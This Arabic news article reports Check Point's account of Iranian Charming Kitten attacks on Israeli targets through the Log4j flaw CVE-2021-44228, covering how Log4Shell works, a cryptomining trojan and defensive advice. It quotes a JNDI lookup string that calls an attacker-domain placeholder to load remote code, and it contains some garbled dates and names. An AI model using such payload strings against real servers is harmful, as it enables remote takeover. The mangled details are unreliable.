قراصنة إيرانيون يستهدفون منظمات تجارية وحكومية في إسرائيل.. فهل نجحوا بذلك؟

أحمد باطبي- إيران وير

أعلنت شركة تشيك بوينت Check Point للأمن السيبراني يوم الأربعاء 15 ديسمبر/ كانون الأول 2021 عن إحباط هجوم سيبراني إيراني على 7 أهداف إسرائيلية.

وذكرت الشركة الإسرائيلية – الأمريكية أن مجموعة القرصنة المعروفة باسم “الهررة الجذابة” (Charming Kitten) وهي مجموعة فرعية من مجموعات APT35 التابعة لمجموعة التهديد المتطور المستمر، قد حاولت اختراق 7 منظمات تجارية وحكومية في إسرائيل من خلال استغلال ثغرة أمنية في تطبيق Log4j.

شُنت هذه الهجمات في الفترة ما بين السادسة صباحًا والرابعة بعد الظهر بالتوقيت المحلي أي خلال ساعات الدوام الرسمي.

يُطلق اسم “إيه بي تي” أو (Advanced Persistent Threat) على مجموعات القرصنة المدعومة من الحكومات والتي تمثل تهديدًا مستمرًا وممنهجًا من وجهة نظر المجتمع الدولي.

وتستهدف هذه المجموعات، حكومات العدو أو الخصوم، والمعارضين للنظام، والمؤسسات والكيانات المؤثرة، والشركات التجارية، والمراكز العلمية، وتُعرف مجموعة التهديد المستمر المتقدم بالاختصار APT والأرقام المنسوبة إليها مثل APT33، وAPT34، وAPT39 والتي تمارس أنشطتها الإجرامية السيبرانية تحت دعم الحكومة الإيرانية.

وفق ما ذكرته شركة Check Point، فإن مجموعة قرصنة الهررة الجذابة والتابعة للحرس الثوري الإيراني، قد شنت العديد من الهجمات السيبرانية خلال السنوات الأخيرة على صحفيين ونشطاء ومنظمات مدنية، فضلًا عن الهجوم على أهدافٍ في إسرائيل.

هذا ويُعَّد برنامج Log4j أحد أكثر مكتبات Log Java شيوعًا، والذي بلغ عدد الذين حملوه  أكثر من 400 ألف مرة من مصدره في مستودع GitHub، وتستخدمه العديد من الشركات حول العالم. ووفقًا للإحصاءات، فإن أكثر من 13 مليار جهاز حول العالم قد استخدموا مكتبات جافا منذ عام 2015، وهو ما يشير إلى مدى استغلال هذه الثغرة الأمنية.

في 9 ديسمبر 2021، أكتشفت الثغرة الأمنية في هذا التطبيق، و أبلغ عنها باسم “CVE-2021-44228”. وتتواجد هذه الثغرة الأمنية، في Log4j 2 في الإصدار 2.14.1 وما قبله، وتسمح للمتسللين بتنفيذ الأكواد الضارة عن بُعد (Remote Code Execution). 

تتواجد مكتبة سجلات 4G تقريبًا في كل تطبيق وخدمة إنترنت معروفة؛ بما في ذلك Twitter وAmazon وMicrosoft وغيرها. وإذا نجح المتسللون في استغلال هذه الثغرة الأمنية، سيكون بإمكانهم السيطرة على الخوادم المستندة إلى Java، واستخدامها لأغراض مختلفة.

يعثر المهاجمون على الأهداف الضعيفة بعدة طرق، بما في ذلك البحث عن “logging for Java” في محرك بحث Google أو عن طريق أدوات “المسح”. وباستخدام ميزة “Log4Shell” و “JNDI” في تطبيق Java المرتبط بالوحدة الخطيرة Log4j 2، يقوم بإرسال سلسلة مثل “$ {jndi: ldap: // path / to / code}” المعتمدة على الـ “TCP” المستخدمة من قبل الجهاز الهدف كجزء من اسم المستخدم أو كلمة المرور أو رقم الهاتف أو غير ذلك إلى الجهاز المستهدف والسيطرة عليه.

Timeline

Description automatically generated

تسمح ميزة “JNDI” بتحميل كل ما يخص الـ Java  واستخدامها عبر تطبيق Java. ويُطلق على البروتوكول المستخدم لهذه الميزة أيضًا اسم “LDAP”، وهو أحد البروتوكولات المفتوحة المصدر، ويستخدم للوصول إلى معلومات الدليل. يوجه المهاجم أوامر للبرنامج لاستدعاء فئة “[attacker_domain] / file” عبر سمة JNDI من خلال إرسال سلسلة مثل “$ {jndi: ldap: // [attacker_domain] / file}” وعرض النتيجة باستخدام بروتوكول LDAP.

Text

Description automatically generated

في إصدار أقل حدة من Exploit CVE-2021-44228 “”، يستخرج المهاجم المعلومات السرية للجهاز الهدف عن طريق إرسال طلب “DNS” والتلاعب بالخادم الخاص به.

يفرض إصدار Java 8  وما فوق قيودًا على سلاسل مثل «${jndi:ldap://…}»، لكن هذه القيود لا تدعم الصمود أمام الهجمات المعقدة. هذا لأن البرنامج مكتوب بلغة البرنامج النصي log4j2’s homebrew والذي يُعرف باسم (Lookups)  والذي مع قليل من الإبداع يمكن تطويره لمضاعفة IPS و WAF. ومن ناحية أخرى، فإن بنية مجموعة الرموز هذه تجعل من غير الممكن إجبار المجموعة بأكملها على استخدام الوحدة المصححة حتى إذا تم إصدار تصحيح أمان.

تحذر شركة Check Point من أن استغلال هذه الثغرة الأمنية ينتشر كالنار في الهشيم، وأنها أحد أكثر أشكال الاستغلال شيوعًا لهذه الثغرة الأمنية هو الـ crypto mining أو استعباد الخوادم واستخدام قوتها لاستخراج العملات المشفرة.

شاركت الصناعات المالية والمصرفية والبرمجية، منذ 12 ديسمبر 2021، في خمس دول على الأقل منها إسرائيل والولايات المتحدة وكوريا الجنوبية وسويسرا وقبرص، في تعدين العملات المشفرة، وفقًا لـ Checkpoint.

تذكر Check Point أنه على الرغم من أن معظم هجمات التنقيب عن العملات المشفرة قد استندت إلى أنظمة تشغيل Linux، فقد كشفت الهجمات الأخيرة عن تحميل تروجان على أساس “دوت نت” يُسمى “Win32 sfrnp” بالتنسيق التشغيلي (exe)، والذي تم اكتشافه أثناء عملية “StealthLoader”، حيث إنه يصيب نظام التشغيل Windows، ويقوم بتثبيت “cyptro-miner” عليه لاستخدام جهاز الضحية لاستخراج العملات المشفرة دون علم الضحية.

في البداية، يحاول تروجان “Win32 sfrnp.exe” التشغيل في بيئة معزولة. وفي حالة عدم إمكانية إنشاء بيئة معزولة، يتم وضع هذه البرامج الضارة في المسار “C:\Windows\Temp” لنظام التشغيل Windows ويتم إنشاء مجلد جديد باسم “sfrpn” بتاريخ 7 يناير 1967 لإخفاء نفسه عن الأنظار عبر تعليق عملية التشغيل.

بعد استقرار هذا البرنامج الضار على جهاز الضحية، يقوم بتثبيت مستخرج العملة الاختصاصي “XMRig” مع محفظة Rosemary Lemonero الشخصية، ويتم استخدام موارد نظام الضحية لمنع تحديد الهوية.

تُظهر الصورة التالية مثالاً على البرامج الضارة التي تم اكتشافها عن طريق تنزيل نسخة من “PowerShell script” عبر بروتوكول “HTTP” وتثبيت عدة أنواع من البرامج الضارة من خادم آي بي 2[.]56.59.123. الموجود في أمريكا.

Graphical user interface, text, application

Description automatically generated

وفي الساعات الأولى من تداول التقارير عن هذه الثغرة الأمنية، في يوم الجمعة 10 سبتمبر 2021، رصدت شركة Check Point نحو 60 استغلالًا لهذه الثغرة الأمنية الخطيرة في أقل من 24 ساعة. وزادت هذه الهجمات إلى 40.000 هجوم مرة واحدة في اليوم التالي، ثم إلى 200 ألف هجوم في اليوم الذي يليه، وإلى 800 ألف هجوم في اليوم الذي يليه.

Chart, line chart

Description automatically generated

وفي وصف الاستغلال الواسع للثغرة الأمنية الخطيرة “CVE-2021-44228″، استخدمت شركة Check Point مصطلح “pandemic” أي “الجائحة” والذي تم استخدامه في العامين الماضيين للإشارة إلى تفشي فيروس كورونا.

وحتى لحظة إعداد هذا التقرير، عانت نحو 90 دولة من هجمات القرصنة على ثغرة Log4j 2. وتشير التقديرات إلى تأثر نحو 50٪ من شبكات الشركات داخل الحدود الجغرافية لهذه الدول ونحو 44٪ من شبكات الشركات في جميع أنحاء العالم بهذه الهجمات.

لقد ذكرت شركة Check Point أن الحيلولة دون الوقوع في أزمة هذه الثغرات الأمنية، يتطلب:

-المراقبة وفك التشفير: تحليل عبء حركة المرور على الشبكة والأجهزة ذات الصلة، والتحقق من ” HTTP headers”، واستخراج “JSON / XML” وفحص طبيعة عبء الشبكة.

-التحقق من علامات الهجوم: استخراج ما يتم تبادله بين الجهاز أو الشبكة بالمجال الخارجي والبحث عن علامات الإصابة، مثل “Remote Code Execution” أو “Command Injection”.

-استخدام محرك تقييم نصي: تحديد مدى التدمير النهائي للشحنات وتسجيل المؤشرات.

كما توصي Checkpoint باستخدام محركات طرفية أخرى مثل CloudGuard AppSec وAPI Protection وWeb Anti-Bot وIPS وSchema Validation لفحص المشكلات المختلفة مثل تبادل المعلومات في بوابات تطبيقات التوقيع الإلكتروني وما إلى ذلك.

اشترك في نشرتنا الإخبارية
اشترك هنا للحصول على آخر الأخبار والتحديثات والعروض الخاصة التي يتم تسليمها مباشرة إلى صندوق الوارد الخاص بك.
يمكنك إلغاء الاشتراك في أي وقت
قد يعجبك ايضا

يستخدم هذا الموقع ملفات تعريف الارتباط لتحسين تجربتك. سنفترض أنك موافق على ذلك ، ولكن يمكنك إلغاء الاشتراك إذا كنت ترغب في ذلك. قبول قراءة المزيد